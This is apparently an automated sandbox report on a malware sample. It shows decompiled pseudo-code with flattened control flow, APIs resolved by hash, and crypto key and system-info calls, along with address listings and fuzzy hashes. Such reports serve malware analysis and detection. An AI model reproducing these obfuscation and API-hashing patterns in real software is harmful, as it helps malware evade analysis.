                                                                                                      				intOrPtr* _t68;
                                                                                                      				intOrPtr _t72;
                                                                                                      				intOrPtr* _t79;
                                                                                                      				intOrPtr* _t80;
                                                                                                      				intOrPtr _t81;
                                                                                                      				intOrPtr _t94;
                                                                                                      				intOrPtr* _t101;
                                                                                                      				intOrPtr _t104;
                                                                                                      				intOrPtr _t106;
                                                                                                      				intOrPtr* _t109;
                                                                                                      				signed int _t110;
                                                                                                      				void* _t111;
                                                                                                      				void* _t122;
                                                                                                      				void* _t124;
                                                                                                      				void* _t125;
                                                                                                      
                                                                                                      				_t109 = __ecx;
                                                                                                      				_t110 = 0x39e18cdf;
                                                                                                      				goto L1;
                                                                                                      				do {
                                                                                                      					while(1) {
                                                                                                      						L1:
                                                                                                      						_t124 = _t110 - 0x19e7a79d;
                                                                                                      						if(_t124 > 0) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						if(_t124 == 0) {
                                                                                                      							_t62 =  *0x20be0b4; // 0x0
                                                                                                      							__eflags = _t62;
                                                                                                      							if(_t62 == 0) {
                                                                                                      								_t62 = E020B3DD0(_t60, E020B3E70(0x60f9cb2), 0x4067403f, _t122);
                                                                                                      								 *0x20be0b4 = _t62;
                                                                                                      							}
                                                                                                      							_t16 =  *0x20be360; // 0x53b7e8
                                                                                                      							 *_t62( *((intOrPtr*)(_t16 + 0x40)));
                                                                                                      							_t110 = 0xfd535c1;
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							_t125 = _t110 - 0xfd535c1;
                                                                                                      							if(_t125 > 0) {
                                                                                                      								__eflags = _t110 - 0x1099ae2c;
                                                                                                      								if(_t110 == 0x1099ae2c) {
                                                                                                      									_t20 =  *0x20be0bc;
                                                                                                      									__eflags = _t20;
                                                                                                      									if(_t20 == 0) {
                                                                                                      										_t20 = E020B3DD0(_t60, E020B3E70(0x38d3324d), 0x88c76e62, _t122);
                                                                                                      										 *0x20be0bc = _t20;
                                                                                                      									}
                                                                                                      									_t21 =  *_t20(0x10001, 0x13,  *_t109,  *((intOrPtr*)(_t109 + 4)), 0x8000, 0,  &_v8,  &_v4); // executed
                                                                                                      									asm("sbb esi, esi");
                                                                                                      									_t110 = ( ~_t21 & 0x0ab70382) + 0xfd535c1;
                                                                                                      									continue;
                                                                                                      								} else {
                                                                                                      									__eflags = _t110 - 0x10ebb7b6;
                                                                                                      									if(_t110 != 0x10ebb7b6) {
                                                                                                      										goto L32;
                                                                                                      									} else {
                                                                                                      										_t67 =  *0x20bdf44;
                                                                                                      										__eflags = _t67;
                                                                                                      										if(_t67 == 0) {
                                                                                                      											_t67 = E020B3DD0(_t60, E020B3E70(0x60f9cb2), 0x46e773c, _t122);
                                                                                                      											 *0x20bdf44 = _t67;
                                                                                                      										}
                                                                                                      										_t23 =  *0x20be360; // 0x53b7e8
                                                                                                      										_t25 =  *_t67(_t23 + 4, 0, 0, 0x18, 0xf0000040); // executed
                                                                                                      										asm("sbb esi, esi");
                                                                                                      										_t110 = ( ~_t25 & 0xf09cbf3c) + 0x1ffceef0;
                                                                                                      										continue;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(_t125 == 0) {
                                                                                                      									_t68 =  *0x20bddf4; // 0x0
                                                                                                      									__eflags = _t68;
                                                                                                      									if(_t68 == 0) {
                                                                                                      										_t68 = E020B3DD0(_t60, E020B3E70(0x60f9cb2), 0x679ebf5a, _t122);
                                                                                                      										 *0x20bddf4 = _t68;
                                                                                                      									}
                                                                                                      									_t28 =  *0x20be360; // 0x53b7e8
                                                                                                      									 *_t68( *((intOrPtr*)(_t28 + 4)), 0);
                                                                                                      									_t110 = 0x1ffceef0;
                                                                                                      									continue;
                                                                                                      								} else {
                                                                                                      									if(_t110 == 0xe3d4ee5) {
                                                                                                      										_t32 =  *0x20bdfac;
                                                                                                      										__eflags = _t32;
                                                                                                      										if(_t32 == 0) {
                                                                                                      											_t32 = E020B3DD0(_t60, E020B3E70(0x60f9cb2), 0x61646814, _t122);
                                                                                                      											 *0x20bdfac = _t32;
                                                                                                      										}
                                                                                                      										_t94 =  *0x20be360; // 0x53b7e8
                                                                                                      										_t2 = _t94 + 0x20; // 0x53b808
                                                                                                      										_t33 =  *_t32( *((intOrPtr*)(_t94 + 4)), 0x8004, 0, 0, _t2); // executed
                                                                                                      										__eflags = _t33;
                                                                                                      										if(_t33 != 0) {
                                                                                                      											return 1;
                                                                                                      										} else {
                                                                                                      											_t110 = 0xea826af;
                                                                                                      											continue;
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										if(_t110 != 0xea826af) {
                                                                                                      											goto L32;
                                                                                                      										} else {
                                                                                                      											_t35 =  *0x20be0b4; // 0x0
                                                                                                      											if(_t35 == 0) {
                                                                                                      												_t35 = E020B3DD0(_t60, E020B3E70(0x60f9cb2), 0x4067403f, _t122);
                                                                                                      												 *0x20be0b4 = _t35;
                                                                                                      											}
                                                                                                      											_t72 =  *0x20be360; // 0x53b7e8
                                                                                                      											 *_t35( *((intOrPtr*)(_t72 + 0x1c)));
                                                                                                      											_t110 = 0x19e7a79d;
                                                                                                      											continue;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L52:
                                                                                                      					}
                                                                                                      					__eflags = _t110 - 0x250df931;
                                                                                                      					if(__eflags > 0) {
                                                                                                      						__eflags = _t110 - 0x39e18cdf;
                                                                                                      						if(_t110 != 0x39e18cdf) {
                                                                                                      							goto L32;
                                                                                                      						} else {
                                                                                                      							_t37 =  *0x20bddc8;
                                                                                                      							__eflags = _t37;
                                                                                                      							if(_t37 == 0) {
                                                                                                      								_t37 = E020B3DD0(_t60, E020B3E70(0xbb51e2dc), 0x298e8809, _t122);
                                                                                                      								 *0x20bddc8 = _t37;
                                                                                                      							}
                                                                                                      							_t111 =  *_t37();
                                                                                                      							_t39 =  *0x20bdcf0;
                                                                                                      							__eflags = _t39;
                                                                                                      							if(_t39 == 0) {
                                                                                                      								_t39 = E020B3DD0(_t60, E020B3E70(0xbb51e2dc), 0xc9d236a5, _t122);
                                                                                                      								 *0x20bdcf0 = _t39;
                                                                                                      							}
                                                                                                      							_t101 =  *_t39(_t111, 8, 0x4c);
                                                                                                      							 *0x20be360 = _t101;
                                                                                                      							__eflags = _t101;
                                                                                                      							if(_t101 == 0) {
                                                                                                      								goto L51;
                                                                                                      							} else {
                                                                                                      								_t110 = 0x10ebb7b6;
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					} else {
                                                                                                      						if(__eflags == 0) {
                                                                                                      							_t79 =  *0x20be0fc;
                                                                                                      							__eflags = _t79;
                                                                                                      							if(_t79 == 0) {
                                                                                                      								_t79 = E020B3DD0(_t60, E020B3E70(0x60f9cb2), 0x7f75d0f1, _t122);
                                                                                                      								 *0x20be0fc = _t79;
                                                                                                      							}
                                                                                                      							_t104 =  *0x20be360; // 0x53b7e8
                                                                                                      							_t14 = _t104 + 0x1c; // 0x53b804
                                                                                                      							_t43 =  *_t79( *((intOrPtr*)(_t104 + 4)), 0x660e, 1, _t14); // executed
                                                                                                      							asm("sbb esi, esi");
                                                                                                      							_t110 = ( ~_t43 & 0xf455a748) + 0x19e7a79d;
                                                                                                      							goto L1;
                                                                                                      						} else {
                                                                                                      							__eflags = _t110 - 0x1a8c3943;
                                                                                                      							if(_t110 == 0x1a8c3943) {
                                                                                                      								_t80 =  *0x20be2ec;
                                                                                                      								__eflags = _t80;
                                                                                                      								if(_t80 == 0) {
                                                                                                      									_t80 = E020B3DD0(_t60, E020B3E70(0x60f9cb2), 0x8b503200, _t122);
                                                                                                      									 *0x20be2ec = _t80;
                                                                                                      								}
                                                                                                      								_t106 =  *0x20be360; // 0x53b7e8
                                                                                                      								_t9 = _t106 + 0x40; // 0x53b828
                                                                                                      								 *_t80( *((intOrPtr*)(_t106 + 4)), _v8, _v4, 0, 0, _t9); // executed
                                                                                                      								asm("sbb esi, esi");
                                                                                                      								_t49 =  *0x20bdd70;
                                                                                                      								_t110 = (_t110 & 0x1538c370) + 0xfd535c1;
                                                                                                      								__eflags = _t49;
                                                                                                      								if(_t49 == 0) {
                                                                                                      									_t49 = E020B3DD0(_t60, E020B3E70(0xbb51e2dc), 0x5f63df9b, _t122);
                                                                                                      									 *0x20bdd70 = _t49;
                                                                                                      								}
                                                                                                      								 *_t49(_v32);
                                                                                                      								goto L32;
                                                                                                      							} else {
                                                                                                      								__eflags = _t110 - 0x1ffceef0;
                                                                                                      								if(_t110 == 0x1ffceef0) {
                                                                                                      									_t81 =  *0x20be360; // 0x53b7e8
                                                                                                      									E020B4180(_t60, _t81);
                                                                                                      									L51:
                                                                                                      									__eflags = 0;
                                                                                                      									return 0;
                                                                                                      								} else {
                                                                                                      									goto L32;
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					goto L52;
                                                                                                      					L32:
                                                                                                      					__eflags = _t110 - 0x1a3539d7;
                                                                                                      				} while (_t110 != 0x1a3539d7);
                                                                                                      				__eflags = 0;
                                                                                                      				return 0;
                                                                                                      				goto L52;
                                                                                                      			}





































                                                                                                      0x020b2585
                                                                                                      0x020b2587
                                                                                                      0x020b2587
                                                                                                      0x020b2590
                                                                                                      0x020b2590
                                                                                                      0x020b2590
                                                                                                      0x020b2590
                                                                                                      0x020b2596
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b259c
                                                                                                      0x020b274d
                                                                                                      0x020b2753
                                                                                                      0x020b2755
                                                                                                      0x020b276d
                                                                                                      0x020b276f
                                                                                                      0x020b276f
                                                                                                      0x020b2775
                                                                                                      0x020b277d
                                                                                                      0x020b277f
                                                                                                      0x00000000
                                                                                                      0x020b25a2
                                                                                                      0x020b25a2
                                                                                                      0x020b25a8
                                                                                                      0x020b268a
                                                                                                      0x020b2690
                                                                                                      0x020b26f3
                                                                                                      0x020b26f8
                                                                                                      0x020b26fa
                                                                                                      0x020b270d
                                                                                                      0x020b2712
                                                                                                      0x020b2712
                                                                                                      0x020b2734
                                                                                                      0x020b273a
                                                                                                      0x020b2742
                                                                                                      0x00000000
                                                                                                      0x020b2692
                                                                                                      0x020b2692
                                                                                                      0x020b2698
                                                                                                      0x00000000
                                                                                                      0x020b269e
                                                                                                      0x020b269e
                                                                                                      0x020b26a4
                                                                                                      0x020b26a6
                                                                                                      0x020b26be
                                                                                                      0x020b26c0
                                                                                                      0x020b26c0
                                                                                                      0x020b26c6
                                                                                                      0x020b26da
                                                                                                      0x020b26e0
                                                                                                      0x020b26e8
                                                                                                      0x00000000
                                                                                                      0x020b26e8
                                                                                                      0x020b2698
                                                                                                      0x020b25ae
                                                                                                      0x020b25ae
                                                                                                      0x020b264c
                                                                                                      0x020b2652
                                                                                                      0x020b2654
                                                                                                      0x020b266c
                                                                                                      0x020b266e
                                                                                                      0x020b266e
                                                                                                      0x020b2674
                                                                                                      0x020b267e
                                                                                                      0x020b2680
                                                                                                      0x00000000
                                                                                                      0x020b25b4
                                                                                                      0x020b25ba
                                                                                                      0x020b25fe
                                                                                                      0x020b2603
                                                                                                      0x020b2605
                                                                                                      0x020b2618
                                                                                                      0x020b261d
                                                                                                      0x020b261d
                                                                                                      0x020b2622
                                                                                                      0x020b2628
                                                                                                      0x020b2638
                                                                                                      0x020b263a
                                                                                                      0x020b263c
                                                                                                      0x020b2919
                                                                                                      0x020b2642
                                                                                                      0x020b2642
                                                                                                      0x00000000
                                                                                                      0x020b2642
                                                                                                      0x020b25bc
                                                                                                      0x020b25c2
                                                                                                      0x00000000
                                                                                                      0x020b25c8
                                                                                                      0x020b25c8
                                                                                                      0x020b25cf
                                                                                                      0x020b25e2
                                                                                                      0x020b25e7
                                                                                                      0x020b25e7
                                                                                                      0x020b25ec
                                                                                                      0x020b25f5
                                                                                                      0x020b25f7
                                                                                                      0x00000000
                                                                                                      0x020b25f7
                                                                                                      0x020b25c2
                                                                                                      0x020b25ba
                                                                                                      0x020b25ae
                                                                                                      0x020b25a8
                                                                                                      0x00000000
                                                                                                      0x020b259c
                                                                                                      0x020b2789
                                                                                                      0x020b278f
                                                                                                      0x020b289a
                                                                                                      0x020b28a0
                                                                                                      0x00000000
                                                                                                      0x020b28a6
                                                                                                      0x020b28a6
                                                                                                      0x020b28ab
                                                                                                      0x020b28ad
                                                                                                      0x020b28c0
                                                                                                      0x020b28c5
                                                                                                      0x020b28c5
                                                                                                      0x020b28cc
                                                                                                      0x020b28ce
                                                                                                      0x020b28d3
                                                                                                      0x020b28d5
                                                                                                      0x020b28e8
                                                                                                      0x020b28ed
                                                                                                      0x020b28ed
                                                                                                      0x020b28f9
                                                                                                      0x020b28fb
                                                                                                      0x020b2901
                                                                                                      0x020b2903
                                                                                                      0x00000000
                                                                                                      0x020b2905
                                                                                                      0x020b2905
                                                                                                      0x00000000
                                                                                                      0x020b2905
                                                                                                      0x020b2903
                                                                                                      0x020b2795
                                                                                                      0x020b2795
                                                                                                      0x020b2845
                                                                                                      0x020b284b
                                                                                                      0x020b284d
                                                                                                      0x020b2865
                                                                                                      0x020b2867
                                                                                                      0x020b2867
                                                                                                      0x020b286d
                                                                                                      0x020b2873
                                                                                                      0x020b2881
                                                                                                      0x020b2887
                                                                                                      0x020b288f
                                                                                                      0x00000000
                                                                                                      0x020b279b
                                                                                                      0x020b279b
                                                                                                      0x020b27a1
                                                                                                      0x020b27c3
                                                                                                      0x020b27c9
                                                                                                      0x020b27cb
                                                                                                      0x020b27e3
                                                                                                      0x020b27e5
                                                                                                      0x020b27e5
                                                                                                      0x020b27eb
                                                                                                      0x020b27f1
                                                                                                      0x020b2804
                                                                                                      0x020b2808
                                                                                                      0x020b280a
                                                                                                      0x020b2815
                                                                                                      0x020b281b
                                                                                                      0x020b281d
                                                                                                      0x020b2830
                                                                                                      0x020b2835
                                                                                                      0x020b2835
                                                                                                      0x020b283e
                                                                                                      0x00000000
                                                                                                      0x020b27a3
                                                                                                      0x020b27a3
                                                                                                      0x020b27a9
                                                                                                      0x020b291a
                                                                                                      0x020b2920
                                                                                                      0x020b2926
                                                                                                      0x020b2926
                                                                                                      0x020b292c
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b27a9
                                                                                                      0x020b27a1
                                                                                                      0x020b2795
                                                                                                      0x00000000
                                                                                                      0x020b27af
                                                                                                      0x020b27af
                                                                                                      0x020b27af
                                                                                                      0x020b27bc
                                                                                                      0x020b27c2
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?), ref: 020B2734
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CryptDecodeObject
                                                                                                      • String ID: ?@g@$?@g@
                                                                                                      • API String ID: 1207547050-3483824452
                                                                                                      • Opcode ID: 351dc39ffc6a5fc4b1acc427167928056997d880f11d4dc4a437bba317db105b
                                                                                                      • Instruction ID: 382c8e9383cb3bca7de32b7f565d129cd1799232a8c49319973a886269e8899a
                                                                                                      • Opcode Fuzzy Hash: 351dc39ffc6a5fc4b1acc427167928056997d880f11d4dc4a437bba317db105b
                                                                                                      • Instruction Fuzzy Hash: A4810131F443119FDB7BAB74D865BEA72D3BF84700F104869AD169B290EA389C40ABC1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 58%
                                                                                                      			E020B5300(void* __ebx, void* __ebp) {
                                                                                                      				signed char _v2;
                                                                                                      				signed int _v276;
                                                                                                      				signed int _v280;
                                                                                                      				char _v284;
                                                                                                      				signed short _v320;
                                                                                                      				void* _t8;
                                                                                                      				intOrPtr* _t15;
                                                                                                      				intOrPtr* _t18;
                                                                                                      				void* _t22;
                                                                                                      				void* _t31;
                                                                                                      				void* _t32;
                                                                                                      				void* _t35;
                                                                                                      
                                                                                                      				_t32 = __ebp;
                                                                                                      				_t22 = __ebx;
                                                                                                      				_t8 = 0x19226663;
                                                                                                      				_t31 = 0;
                                                                                                      				goto L1;
                                                                                                      				do {
                                                                                                      					while(1) {
                                                                                                      						L1:
                                                                                                      						_t35 = _t8 - 0x2a0036b4;
                                                                                                      						if(_t35 > 0) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						if(_t35 == 0) {
                                                                                                      							_t15 =  *0x20bdc7c;
                                                                                                      							_v284 = 0x11c;
                                                                                                      							if(_t15 == 0) {
                                                                                                      								_t15 = E020B3DD0(_t22, E020B3E70(0xe60124ba), 0x49158360, _t32);
                                                                                                      								 *0x20bdc7c = _t15;
                                                                                                      							}
                                                                                                      							 *_t15( &_v284);
                                                                                                      							_t8 = 0x1945f8a;
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							if(_t8 == 0x1945f8a) {
                                                                                                      								_t18 =  *0x20be1dc;
                                                                                                      								if(_t18 == 0) {
                                                                                                      									_t18 = E020B3DD0(_t22, E020B3E70(0xbb51e2dc), 0x84b17446, _t32);
                                                                                                      									 *0x20be1dc = _t18;
                                                                                                      								}
                                                                                                      								 *_t18( &_v320); // executed
                                                                                                      								_t8 = 0x2efd0e3b;
                                                                                                      								continue;
                                                                                                      							} else {
                                                                                                      								if(_t8 == 0x7e3ea5e) {
                                                                                                      									_t31 = _t31 + _v280 * 0x3e8;
                                                                                                      									_t8 = 0x3b6c3dab;
                                                                                                      									continue;
                                                                                                      								} else {
                                                                                                      									if(_t8 != 0x19226663) {
                                                                                                      										goto L18;
                                                                                                      									} else {
                                                                                                      										_t8 = 0x2a0036b4;
                                                                                                      										continue;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L22:
                                                                                                      					}
                                                                                                      					if(_t8 == 0x2efd0e3b) {
                                                                                                      						_t31 = _t31 + (_v2 & 0x000000ff) * 0x186a0;
                                                                                                      						_t8 = 0x7e3ea5e;
                                                                                                      						goto L1;
                                                                                                      					} else {
                                                                                                      						if(_t8 == 0x348307ee) {
                                                                                                      							return (_v320 & 0x0000ffff) + _t31;
                                                                                                      						} else {
                                                                                                      							if(_t8 != 0x3b6c3dab) {
                                                                                                      								goto L18;
                                                                                                      							} else {
                                                                                                      								_t31 = _t31 + _v276 * 0x64;
                                                                                                      								_t8 = 0x348307ee;
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					goto L22;
                                                                                                      					L18:
                                                                                                      				} while (_t8 != 0x373c4ea);
                                                                                                      				return _t31;
                                                                                                      				goto L22;
                                                                                                      			}















                                                                                                      0x020b5300
                                                                                                      0x020b5300
                                                                                                      0x020b5306
                                                                                                      0x020b530c
                                                                                                      0x020b530c
                                                                                                      0x020b5310
                                                                                                      0x020b5310
                                                                                                      0x020b5310
                                                                                                      0x020b5310
                                                                                                      0x020b5315
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b531b
                                                                                                      0x020b5380
                                                                                                      0x020b5385
                                                                                                      0x020b538f
                                                                                                      0x020b53a2
                                                                                                      0x020b53a7
                                                                                                      0x020b53a7
                                                                                                      0x020b53b1
                                                                                                      0x020b53b3
                                                                                                      0x00000000
                                                                                                      0x020b531d
                                                                                                      0x020b5322
                                                                                                      0x020b534e
                                                                                                      0x020b5355
                                                                                                      0x020b5368
                                                                                                      0x020b536d
                                                                                                      0x020b536d
                                                                                                      0x020b5377
                                                                                                      0x020b5379
                                                                                                      0x00000000
                                                                                                      0x020b5324
                                                                                                      0x020b5329
                                                                                                      0x020b5345
                                                                                                      0x020b5347
                                                                                                      0x00000000
                                                                                                      0x020b532b
                                                                                                      0x020b5330
                                                                                                      0x00000000
                                                                                                      0x020b5336
                                                                                                      0x020b5336
                                                                                                      0x00000000
                                                                                                      0x020b5336
                                                                                                      0x020b5330
                                                                                                      0x020b5329
                                                                                                      0x020b5322
                                                                                                      0x00000000
                                                                                                      0x020b531b
                                                                                                      0x020b53c2
                                                                                                      0x020b5406
                                                                                                      0x020b5408
                                                                                                      0x00000000
                                                                                                      0x020b53c4
                                                                                                      0x020b53c9
                                                                                                      0x020b5420
                                                                                                      0x020b53cb
                                                                                                      0x020b53d0
                                                                                                      0x00000000
                                                                                                      0x020b53d2
                                                                                                      0x020b53d7
                                                                                                      0x020b53d9
                                                                                                      0x00000000
                                                                                                      0x020b53d9
                                                                                                      0x020b53d0
                                                                                                      0x020b53c9
                                                                                                      0x00000000
                                                                                                      0x020b53e3
                                                                                                      0x020b53e3
                                                                                                      0x020b53f7
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • GetNativeSystemInfo.KERNELBASE(3444DC2F,3444DC2F), ref: 020B5377
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InfoNativeSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1721193555-0
                                                                                                      • Opcode ID: ed8ceb6a7c1f517a60b759d567c83976a892b740de7115a4b3052911e1b2757a
                                                                                                      • Instruction ID: 00d2c11650fcaa4c8fdd1aabaf83d327cbd587c2d8869497a7262dc8aa40a83e
                                                                                                      • Opcode Fuzzy Hash: ed8ceb6a7c1f517a60b759d567c83976a892b740de7115a4b3052911e1b2757a
                                                                                                      • Instruction Fuzzy Hash: 0F21F561A1431087D77B96388CC12FE7DC1AF94B44FD84DA6E45AE7350E778C940AB83
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 60%
                                                                                                      			E020B2240(intOrPtr* __ecx, signed int __edx) {
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				signed int _t49;
                                                                                                      				signed int _t50;
                                                                                                      				intOrPtr _t51;
                                                                                                      				signed int _t53;
                                                                                                      				signed int _t58;
                                                                                                      				intOrPtr _t62;
                                                                                                      				intOrPtr _t69;
                                                                                                      				signed int _t70;
                                                                                                      				signed int _t75;
                                                                                                      				signed int _t78;
                                                                                                      				signed int _t83;
                                                                                                      				signed int _t91;
                                                                                                      				intOrPtr* _t94;
                                                                                                      				signed int _t97;
                                                                                                      				intOrPtr _t101;
                                                                                                      				intOrPtr* _t104;
                                                                                                      				signed int _t111;
                                                                                                      				signed int _t115;
                                                                                                      				signed int _t119;
                                                                                                      				intOrPtr _t120;
                                                                                                      				signed int _t121;
                                                                                                      				intOrPtr _t123;
                                                                                                      				intOrPtr* _t125;
                                                                                                      				void* _t126;
                                                                                                      				void* _t128;
                                                                                                      				void* _t129;
                                                                                                      
                                                                                                      				_t83 =  *(_t126 + 0x14);
                                                                                                      				 *(_t126 + 0x14) = __edx;
                                                                                                      				_t125 = __ecx;
                                                                                                      				_t119 = 0;
                                                                                                      				_t121 = 0x32c8b508;
                                                                                                      				while(1) {
                                                                                                      					L1:
                                                                                                      					 *(_t126 + 0x1c) = _t119;
                                                                                                      					while(1) {
                                                                                                      						do {
                                                                                                      							while(1) {
                                                                                                      								L3:
                                                                                                      								_t128 = _t121 - 0x2268ca03;
                                                                                                      								if(_t128 > 0) {
                                                                                                      									break;
                                                                                                      								}
                                                                                                      								if(_t128 == 0) {
                                                                                                      									_t49 =  *0x20bde6c;
                                                                                                      									 *(_t126 + 0x28) = 0x14;
                                                                                                      									__eflags = _t49;
                                                                                                      									if(_t49 == 0) {
                                                                                                      										_t49 = E020B3DD0(_t83, E020B3E70(0x60f9cb2), 0xc36d7cfb, _t125);
                                                                                                      										 *0x20bde6c = _t49;
                                                                                                      									}
                                                                                                      									_t50 =  *_t49( *(_t126 + 0x28), 2, _t83 + 0x60, _t126 + 0x2c, 0);
                                                                                                      									_t111 =  *(_t126 + 0x14);
                                                                                                      									__eflags = _t50;
                                                                                                      									_t51 =  *((intOrPtr*)(_t126 + 0x10));
                                                                                                      									if(_t50 != 0) {
                                                                                                      										_t121 = 0x250899ad;
                                                                                                      										_t119 = 1;
                                                                                                      										goto L1;
                                                                                                      									}
                                                                                                      									continue;
                                                                                                      								} else {
                                                                                                      									_t129 = _t121 - 0x1e7fd4d2;
                                                                                                      									if(_t129 > 0) {
                                                                                                      										__eflags = _t121 - 0x1f02c9d3;
                                                                                                      										if(_t121 != 0x1f02c9d3) {
                                                                                                      											goto L43;
                                                                                                      										} else {
                                                                                                      											_t53 =  *0x20be0f0;
                                                                                                      											_t123 =  *((intOrPtr*)(_t125 + 4));
                                                                                                      											_t120 =  *_t125;
                                                                                                      											__eflags = _t53;
                                                                                                      											if(_t53 == 0) {
                                                                                                      												_t53 = E020B3DD0(_t83, E020B3E70(0xe60124ba), 0x5006b8db, _t125);
                                                                                                      												 *0x20be0f0 = _t53;
                                                                                                      											}
                                                                                                      											 *_t53( *((intOrPtr*)(_t126 + 0x2c)), _t120, _t123);
                                                                                                      											_t119 =  *(_t126 + 0x28);
                                                                                                      											_t126 = _t126 + 0xc;
                                                                                                      											_t111 =  *(_t126 + 0x14);
                                                                                                      											_t121 = 0x17a04c7e;
                                                                                                      											while(1) {
                                                                                                      												goto L3;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										if(_t129 == 0) {
                                                                                                      											__eflags = _t119;
                                                                                                      											if(_t119 == 0) {
                                                                                                      												E020B4180(_t83,  *_t111);
                                                                                                      											}
                                                                                                      											goto L47;
                                                                                                      										} else {
                                                                                                      											if(_t121 == 0xc9d0246) {
                                                                                                      												_t91 =  *((intOrPtr*)(_t125 + 4)) + 1;
                                                                                                      												__eflags = _t91 & 0x0000000f;
                                                                                                      												if((_t91 & 0x0000000f) != 0) {
                                                                                                      													_t91 = (_t91 & 0xfffffff0) + 0x10;
                                                                                                      													__eflags = _t91;
                                                                                                      												}
                                                                                                      												 *((intOrPtr*)(_t111 + 4)) = _t91 + 0x74;
                                                                                                      												_t58 = E020B4220(_t83, _t91 + 0x74);
                                                                                                      												_t111 =  *(_t126 + 0x14);
                                                                                                      												_t83 = _t58;
                                                                                                      												 *_t111 = _t83;
                                                                                                      												__eflags = _t83;
                                                                                                      												if(_t83 == 0) {
                                                                                                      													L47:
                                                                                                      													return _t119;
                                                                                                      												} else {
                                                                                                      													_t17 = _t83 + 0x74; // 0x74
                                                                                                      													 *((intOrPtr*)(_t126 + 0x24)) = _t17;
                                                                                                      													_t121 = 0x2572d88b;
                                                                                                      													_t51 =  *((intOrPtr*)(_t111 + 4)) - 0x74;
                                                                                                      													 *((intOrPtr*)(_t126 + 0x2c)) =  *((intOrPtr*)(_t125 + 4));
                                                                                                      													 *((intOrPtr*)(_t126 + 0x10)) = _t51;
                                                                                                      													continue;
                                                                                                      												}
                                                                                                      											} else {
                                                                                                      												if(_t121 != 0x17a04c7e) {
                                                                                                      													goto L43;
                                                                                                      												} else {
                                                                                                      													_t94 =  *0x20be1f4;
                                                                                                      													if(_t94 == 0) {
                                                                                                      														_t94 = E020B3DD0(_t83, E020B3E70(0x60f9cb2), 0xc51cfddb, _t125);
                                                                                                      														_t51 =  *((intOrPtr*)(_t126 + 0x10));
                                                                                                      														 *0x20be1f4 = _t94;
                                                                                                      													}
                                                                                                      													_t62 =  *0x20be360; // 0x53b7e8
                                                                                                      													 *_t94( *((intOrPtr*)(_t62 + 0x1c)),  *((intOrPtr*)(_t126 + 0x2c)), 1, 0,  *((intOrPtr*)(_t126 + 0x2c)), _t126 + 0x30, _t51);
                                                                                                      													_t111 =  *(_t126 + 0x14);
                                                                                                      													asm("sbb esi, esi");
                                                                                                      													_t121 = (_t121 & 0x0ea95bf3) + 0x250899ad;
                                                                                                      													while(1) {
                                                                                                      														goto L3;
                                                                                                      													}
                                                                                                      												}
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      								L48:
                                                                                                      							}
                                                                                                      							__eflags = _t121 - 0x32c8b508;
                                                                                                      							if(__eflags > 0) {
                                                                                                      								__eflags = _t121 - 0x33b1f5a0;
                                                                                                      								if(_t121 != 0x33b1f5a0) {
                                                                                                      									goto L43;
                                                                                                      								} else {
                                                                                                      									_t97 =  *0x20bde78;
                                                                                                      									 *((intOrPtr*)(_t126 + 0x20)) = 0x6c;
                                                                                                      									__eflags = _t97;
                                                                                                      									if(_t97 == 0) {
                                                                                                      										_t97 = E020B3DD0(_t83, E020B3E70(0x60f9cb2), 0xf1fc6771, _t125);
                                                                                                      										 *0x20bde78 = _t97;
                                                                                                      									}
                                                                                                      									_t69 =  *0x20be360; // 0x53b7e8
                                                                                                      									_t70 =  *_t97( *((intOrPtr*)(_t69 + 0x1c)),  *((intOrPtr*)(_t69 + 0x40)), 1, 0x40, _t126 + 0x34, _t126 + 0x20); // executed
                                                                                                      									__eflags = _t70;
                                                                                                      									if(_t70 == 0) {
                                                                                                      										_t111 =  *(_t126 + 0x14);
                                                                                                      										_t121 = 0x250899ad;
                                                                                                      										goto L3;
